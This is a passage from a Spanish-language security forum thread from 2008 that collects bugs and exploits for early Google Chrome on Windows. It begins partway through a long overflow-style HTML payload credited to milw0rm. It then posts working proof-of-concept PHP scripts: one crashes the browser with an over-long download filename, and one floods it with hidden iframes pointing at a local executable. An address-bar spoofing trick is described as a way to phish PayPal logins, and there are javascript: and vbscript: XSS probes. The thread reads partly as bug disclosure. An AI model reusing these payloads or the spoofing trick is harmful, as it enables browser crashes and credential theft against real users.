3;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#37008;&#60166;&#2827;)&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#51505;&#59779;&#9332;&#23540;&#29569;&#60435;&#13869;&#33630;&#64747;&#62690;&#50448;&#24178;&#11756;&#7101;&#42704;&#23370;&#11412;&#54745;&#13731;&#445;&#11468;&#6109;&#6503;&#24509;&#7170;&#51190;&#43328;&#10998;&#60651;&#21500;&#61421;&#43741;&#31191;&#23058;&#51353;&#445;&#11464;&#14557;&#8551;&#54653;&#12723;&#46391;&#12647;&#24509;&#41991;&#31338;&#61160;&#40455;&#42632;&#28278;&#60777;&#21070;&#28007;&#54586;&#12700;&#54683;&#9604;&#22493;&#44391;&#24198;&#11756;&#14013;&#29392;&#43015;&#31628;&#42687;&#60783;&#3661;&#23228;&#17843;&#41134;&#9062;&#41313;&#19979;&#12887;&#11663;&#24118;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  22. </head>
  23. Click 'Save As' function for checking this vulnerability.
  24. Note: Opening multiple Calculators.
  25.  
  26. </body>
  27. </html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367
4255  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 6 Septiembre 2008, 00:31 am
Por ahí escuché que Google Chrome no soporta RSS  :(

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss
4256  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 05:47 am
Citar
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citar
about:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.


El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365



Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
4257  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 00:58 am
encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

 :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código
  1. <?php
  2.  
  3. /*
  4. Google Chrome 0.2.149.27 (1583) Silent Crash PoC
  5. WHK - elhacker.net
  6. */
  7.  
  8. $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
  9. $contenido = 'prueba';
  10. header("Content-Type: application/octet-stream");
  11. header("Content-Disposition: attachment; filename=$nombre");
  12. print($contenido);
  13.  
  14. /*
  15. http://www.jccharry.com/pruebas/Google%20Chrome/2.php
  16. http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
  17. http://milw0rm.com/exploits/6365
  18. */
  19.  
  20. ?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*
4258  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 4 Septiembre 2008, 23:12 pm
Citar
Este google chrome esta demasiado beta como para que lo use nadie...
Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.
4259  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 4 Septiembre 2008, 08:11 am
Código
  1. vbscript:alert("XSS");
El explorador no interpreta visual basic scripts.

Código
  1. mms://web.com/radio/
No soporta videos online con windows media video

Código
  1. <?php
  2. echo "Prueba del concepto para probar la vulnerabilidad de Google Chrome
  3. al no reestablecer su barra de navegaci&oacute;n al ser modificada sin ser
  4. establecido como url final.<br>
  5. \$_SERVER[HTTP_HOST] = <b>$_SERVER[HTTP_HOST]</b>"
  6. ?>
http://www.jccharry.com/pruebas/Google%20Chrome/1.php

Lo visualizas y después escribes arriba "https://www.paypal.com" y son presionar enter posicionas el mouse sobre el navegador.
Un atacante podría utilizarlo para robar cuentas remotamente, inclusive desde un ciber... dejas la página inicial de msn con un fake que capture contraseñas.



Esta falla podría ser aprobechado para un phishing facilmente.

Nota: Internet Explorer no presenta ese bug.


Citar
chrome-resource://new-tab/%%
En esta URL el explorador queda cargando infinitamente.

Citar
chrome-resource://thumb/fake
Acá el contenido no es declarado como imagen (Falta la cabezera del header!)



Como se imprime en texto plano, que pasaría si una imagen contiene cntenido HTML?, talves ahora no se sepa como pero con "chrome-resource" talves pueda apuntar a un archivo descargado automáticamente en formato imagen y cargarlo de la misma forma para su ejecución.
PD: Google le hace publicidad a "Adobe ImageReady"  :o


Claro...


Ovbiamente es rápido porque trabaja con multiprocesos pero eso significa utilizar casi la mitad de tus recursos queriendo decir "o navegas o usas photoshop porque acá no podrás caminar y masticar chicle al mismo tiempo"


Citar
chrome-resource://inspector
Ejalee!!!!
Citar
Esta página web tiene un bucle de redireccionamiento.

La página web de chrome-resource://inspector////////////////////// ha provocado demasiados redireccionamientos. Es posible que se solucione el problema si borras las cookies. Si no es así, tal vez se deba a una configuración del servidor y no a un problema con tu equipo.

A continuación se detallan algunas sugerencias:
Carga esta página web de nuevo más tarde.
  Más información sobre este error
Como decia antes, talves puedas tener acceso a la carga de archivos externos al sistema.


No se si alguien me está tirando alguna maldición  :¬¬ pero el explorer no me deja visualizar lo que hay dentro de
Citar
C:\Documents and Settings\Yan\Configuración local\Datos de programa\Google\Chrome\Application\0.2.149.27\Resources\Inspector\Images

4260  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 4 Septiembre 2008, 00:35 am
Lo mas entretenido es que en el soporte de google nadie habla ingles XD
http://code.google.com/p/chromium/issues/detail?id=213

me dicen: "los técnicos solo hablan inglés" y nadie sabe que hablo  :xD entonces supongo que el software fue hecho solamente para los de habla inglesa joder!

hay que explicarles con dibujos y manzanas...


Bueno, sin ir mas ayá solo me molesta que no hablen español pero en cuanto al explorador en si espero que quede bién muy pronto como para salir de la etapa beta y poder utilizarlo con toda normalidad.

Código
  1. <?php
  2. echo "Iniciando prueba del concepto por WHK probando una
  3.          inundaci&oacute;n de mensajes en la bandeja de avisos sin la
  4.          posibilidad de eliminar completamente la barra perdiendo
  5.          links y aumentando el uso de recursos desmedidos.<br>\n";
  6. for($Cuenta=0;$Cuenta<900;$Cuenta++){
  7.  echo '<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" width="0" height="0" frameborder="0"></iframe>'."\n";
  8. }
  9. ?>

Además tiene la misma falla que firefox cuando modificas la barra del explorador y cuando haces click en el espacio de trabajo sin dar enter no buelve a su estado original... por ejemplo entra a https://evil.domain/getdata.php y después ve a tu web preparada para alojar los datos de la victima https://www.paypal.com/ sin dar enter y haciendo click en cualquier parte del formulario, si dejas el explorador en ese estado cualquier persona que intente acceder a su cuenta la estará regalando (IE7 no es vulnerable pero si ayer encontré una falla donde ingresas carácteres nulos en javascript: y la url se mantiene intacta de igual forma).
Páginas: 1 ... 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 [426] 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 ... 455
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines